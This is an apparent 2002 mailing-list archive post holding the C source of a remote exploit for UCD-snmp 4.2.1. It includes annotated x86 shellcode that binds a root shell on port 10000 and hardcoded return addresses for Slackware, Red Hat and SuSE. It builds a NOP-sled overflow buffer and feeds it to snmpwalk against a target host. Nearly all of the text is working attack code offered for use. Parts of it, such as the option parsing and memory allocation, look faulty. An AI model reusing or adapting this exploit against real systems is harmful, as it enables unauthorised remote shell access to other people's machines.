/* UCD-snmp 4.2.1 remote exploit since this leaked, i have no reason to hold it from the securityfocus infosec scene anymore... you need snmpwalk in your local directory to make it work.. use ethically for penetration tests or other lucrative activities only. zen-parse "revealing hacker secrets since 1998 - it takes a hacker to protect you from a hacker" greets: My man Brian McWilliams (The voice of the underground) numacra, The metaray,DWalrus, JimJones AKA GOBBLES, Kimble (the man cant keep you down big boy), The Shadow Knight(#shells won't be the same without ya)... */ #include <stdio.h> #include <unistd.h> #include <sys/stat.h> char code[] = "\x31\xc0" // xor eax, eax "\x31\xdb" // xor ebx, ebx "\x89\xe5" // mov ebp, esp "\x99" // cdq "\xb0\x66" // mov al, 102 "\x89\x5d\xfc" // mov [ebp-4], ebx "\x43" // inc ebx "\x89\x5d\xf8" // mov [ebp-8], ebx "\x43" // inc ebx "\x89\x5d\xf4" // mov [ebp-12], ebx "\x4b" // dec ebx "\x8d\x4d\xf4" // lea ecx, [ebp-12] "\xcd\x80" // int 80h "\x89\x45\xf4" // mov [ebp-12], eax "\x43" // inc ebx "\x66\x89\x5d\xec" // mov [ebp-20], bx "\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135 "\x89\x55\xf0" // mov [ebp-16], edx "\x8d\x45\xec" // lea eax, [ebp-20] "\x89\x45\xf8" // mov [ebp-8], eax "\xc6\x45\xfc\x10" // mov [ebp-4], byte 16 "\xb2\x66" // mov dl, 102 "\x89\xd0" // mov eax, ed "\x8d\x4d\xf4" // lea ecx, [ebp-12] "\xcd\x80" // int 80h "\x89\xd0" // mov eax, edx "\xb3\x04" // mov bl, 4 "\xcd\x80" // int 80h "\x43" // inc ebx "\x89\xd0" // mov eax, edx "\x99" // cdq "\x89\x55\xf8" // mov [ebp-8], edx "\x89\x55\xfc" // mov [ebp-4], edx "\xcd\x80" // int 80h "\x31\xc9" // xor ecx, ecx "\x89\xc3" // mov ebx, eax "\xb1\x03" // mov cl, 3 "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop -7 "\x52" // push edx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x52" // push edx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\x0b" // mov al, 11 "\xcd\x80"; // int 80h struct { char *name; unsigned long ret_addr; int psn1; int psn2; int psn3; int offset; } targets[] = { { "UCD-snmp 4.2.1, Slackware 7.0", 0xbfffc560, 148, 160, 164, 0}, { "UCD-snmp 4.2.1, Redhat 6.2", 0x807dc64, 244, 240, 244, 4}, { "UCD-snmp 4.2.1, Suse 7.2", 0xbfffc76c, 152,152,152,0}, { NULL, 0} }; void usage(char *p) { int i; fprintf(stderr, "*************************************************************\n"); fprintf(stderr, "*************************************************************\n"); fprintf(stderr, " SNMP EXPLOITATION PROOF OF CONCEPT - ETHICAL USES ONLY\n"); fprintf(stderr, "usage: %s [-t type] [-p port] [-o offset] [-w path] <host>\n", p); fprintf(stderr, "-t: target number\n"); fprintf(stderr, "-p: port of snmp \n"); fprintf(stderr, "-o: offset\n"); fprintf(stderr, "-w: path to snmpwalk (default is cwd)\n\n"); fprintf(stderr, "Target Types:\n"); for(i = 0; targets[i].name; i++) fprintf(stderr, "%d) %s\n", i, targets[i].name); fprintf(stderr, "exploit opens shell on port 10000\n"); fprintf(stderr, "\n"); fprintf(stderr, "*************************************************************\n"); fprintf(stderr, "*************************************************************\n"); exit(0); } int main(int argc, char **argv) { char buf[512]; struct stat boo; char *host, *path; int c, type=0, offset=0; char port[6] = "161"; while((c = getopt(argc, argv, "t:o:p:w:")) != EOF){ switch(c){ case 't': type = atoi(optarg); if(type < 0 || type > sizeof(targets)){ fprintf(stderr, "invalid target type\n"); usage(argv[0]); } case 'o': offset = atoi(optarg); break; case 'p': strncpy(port, optarg, 5); break; case 'w': path = (char *)malloc(sizeof(optarg)); strncpy(path, optarg, strlen(optarg)-1); break; } } if(!argv[optind]) usage(argv[0]); host = argv[optind]; memset(buf, 0x90, 256); memcpy(buf+targets[type].psn1,(void *) &targets[type].ret_addr, 4); memcpy(buf+targets[type].psn2,(void *) &targets[type].ret_addr, 4); memcpy(buf+targets[type].psn3,(void *) &targets[type].ret_addr, 4); buf[256] = 0x00; memcpy(buf+targets[type].offset, code, sizeof(code)-1); execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL); } -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net
This archive was generated by hypermail 2b30 : Mon Feb 18 2002 - 20:36:58 PST